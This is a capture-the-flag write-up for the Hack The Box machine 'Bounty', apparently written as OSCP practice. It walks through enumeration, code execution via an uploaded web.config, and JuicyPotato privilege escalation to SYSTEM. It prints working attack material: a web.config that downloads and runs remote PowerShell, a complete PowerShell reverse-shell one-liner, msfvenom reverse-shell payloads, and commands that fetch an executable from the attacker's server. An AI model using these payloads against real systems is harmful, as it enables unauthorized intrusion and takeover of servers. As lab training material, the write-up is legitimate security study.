Hack The Box — Bounty— without Metasploit (TJNull’s list for OSCP)

bounty.htb

This is my 30th write-up for Bounty, a machine from TJNull’s list of HackTheBox machines for OSCP Practice. The full list can be found here.

In a general penetration test or a CTF, there are usually 3 major phases that are involved.

1. Enumeration and Scanning (Information Gathering).
2. Initial Foothold.
3. Privilege Escalation.

Let’s get started with the box!

Enumeration

First, let’s run an nmap scan on default ports to see what services are running on the target system.

nmap -sC -sV -O -Pn -oA nmap/initial bounty.htb

nmap

From the results, we can see that an IIS 7.5 is running on port 80. Let’s see what we have there.

http server

Just an image. Don’t have anything interesting in the source code either. Let’s try doing directory busting and see if it reveals anything.

gobuster dir -u http://bounty.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x asp,aspx,db,jsp,html,log,txt -t 200 -k --no-error

gobuster

So, we have a transfer.aspx and a directory uploadedfiles.

Let’s see what we have on transfer.aspx

/transfer.aspx

An upload page. Interesting…! Now let’s see what we have in uploadedfiles directory.

/uploadedfiles/

And we don’t have access to it. Let’s try uploading an image from the transfer.aspx and see if we can access it here.

file upload

I am simply uploading a PNG image of a dog.

file uploaded

It says “File uploaded successfully.” Let’s see if we can access it from the uploadedfiles directory.

dog.png

Initial Foothold

Let’s upload an aspx shell and get a reverse shell on our system.

First, create an aspx shell using msfvenom.

msfvenom -p windows/shell_reverse_tcp LHOST="10.10.16.5" LPORT=4242 -f aspx > shell.aspx

Let’s try uploading it.

Invalid file upload

It gives an error “Invalid File. Please try again”.

It means that we are not allowed to upload aspx. Let’s see what files are we allowed to upload. And by doing several trial and error, We can see that we are allowed to upload .config files as well.

Going through this article:

Soroush Dalili (@irsdl) - سروش دلیلی

We came to know that web.config file could execute code. Let’s craft a web.config file with the sample code as below, and put the code to download and execute a powershell script that we will be hosting on our own http server.

<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('http://10.10.16.5:80/shell.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>

By uploading and then accessing it; we should get a reverse shell back to our system. First, let’s get a powershell reverse shell and host it. I am gonna be using the following powershell script.

$client = New-Object System.Net.Sockets.TCPClient('10.10.16.5',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Now host it on our python http server.

python3 -m http.server 80

Let’s start a listener on port 4242 and upload the web.config file.

web.config uploaded

The upload is successful. Let’s see if it works by navigating to it in uploadedfiles.

And we got a shell as merlin.

Privilege Escalation

Let’s check what privileges we have.

whoami /priv

We have SeImpersonatePrivilege enabled. It means that JuicyPotaty exploit may work.

Let’s grab JuicyPotato.exe from github.

Releases · ohpe/juicy-potato

Let’s host the exploit by our own smb-server. (Since, file uploading is a pain in this box and we can not upload exe either).

If you have impacket installed you can copy the smbserver.py script to the current working directory.

locate smbserver.py
cp /usr/share/doc/python3-impacket/examples/smbserver.py .

getting smbserver.py from impacket

Let’s put JuicyPotato.exe in the current directory as well, and use python smbserver to host it.

python3 smbserver.py DaemonExala /root/TJNull/Windows/Bounty

Here, DaemonExala is the name of the share that I am creating, you can name it anything you want, and the directory after that is the current working directory of my attacking machine that has JuicyPotato.exe in it.

smbserver running

Now, we have SMB running let’s execute the JuicyPotato.exe from our target.

\\10.10.16.5\DaemonExala\JuicyPotato.exe

JuicyPotato parameters

It gives an error saying that there are 3 mandatory arguments that we must provide.

• -t to create a process: we will use * as it will create the process with Token and AsUser (both)
• -p to specify the program to launch: we will create a new windows shell using msfvenom and upload that to our target and execute that.
• -l Server listen port: a port that the server would communicate on. It doesn’t matter really, we can give it anything in our case (uploading a msfvenom generated shell explicitly and executing it using JuicyPotato.)

Let’s create a shell.exe using msfvenom.

msfvenom -p windows/shell_reverse_tcp LHOST="10.10.16.5" LPORT=8080 -f exe > shell.exe

Let’s start a python http server and download it to our target using powershell reverse shell that we already have.

#(on attacking machine)
python3 -m http.server 80

#(on target machine)
(new-object net.webclient).downloadfile('http://10.10.16.5:80/shell.exe', 'C:\Users\merlin\shell.exe')

python http server running

uploaded shell.exe

We got the shell.exe on the target.

Let’s start a reverse shell to capture the shell that we craeted using msfvenom and run JuicyPotato again using our smbserver and with the appropriate arguments.

\\10.10.16.5\DaemonExala\JuicyPotato.exe -t * -p shell.exe -l 4444

nt authority\system

And we got a System Shell!

;)